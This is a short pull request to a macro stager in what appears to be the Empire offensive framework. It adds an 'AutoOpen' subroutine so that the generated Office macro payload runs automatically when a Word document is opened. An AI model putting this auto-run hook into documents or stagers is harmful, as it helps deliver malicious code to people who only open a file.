### PR TITLE
Auto_Open does not work in Word, only Excel. AutoOpen does.

### DIFF
--- a/lib/stagers/multi/macro.py
+++ b/lib/stagers/multi/macro.py
@@ -140,6 +140,11 @@ class Stager:
     #End If
 #End If
 
+Sub AutoOpen()
+    'MsgBox("AutoOpen()")
+    Debugging
+End Sub
+
 Sub Auto_Open()
     'MsgBox("Auto_Open()")
     Debugging


### PR DESCRIPTION
Added to mirror functionality already present in Windows version (https://github.com/EmpireProject/Empire/blob/master/lib/stagers/windows/macro.py#L116)

Reference: http://projectwoman.com/2008/03/whats-in-a-name-auto_open-or-autoopen.html